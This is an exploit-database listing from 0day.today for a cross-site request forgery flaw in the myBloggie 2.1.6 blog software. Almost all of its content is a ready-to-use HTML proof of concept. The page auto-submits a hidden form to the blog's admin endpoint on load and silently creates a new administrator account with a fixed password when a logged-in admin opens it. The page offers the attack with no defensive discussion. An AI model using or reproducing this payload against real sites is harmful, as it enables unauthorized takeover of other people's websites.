[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

myBloggie 2.1.6 CSRF Vulnerability

Author
LolzSec
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19212
Category
web applications
Date add
17-08-2012
Platform
php
# Exploit Title: myBloggie 2.1.6 CSRF Vulnerability
# Date: 17/8/2012
# Author: LolzSec
# Software Link: http://mywebland.com/download.php?id=19
# Category:: webapps
# Greetings to:    DaOne , All LCA Members , ZQ@R



#####################################################
[#] [ CSRF Add Admin ]
 
<html>
<body onload="document.form1.submit();">
<form action="http://[target]/admin/admin.php?mode=useradmin" method="post" name="form1">
<input type="hidden" name="user" value="webadmin">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="repassword" value="pass123">
<input type="hidden" name="gravatar" value="anony_gravatar.gif">
<input type="hidden" name="level" value="1">
<input type="hidden" name="add" value="Add">
</form>
</body>
</html>

########################################################################



#  0day.today [2024-11-16]  #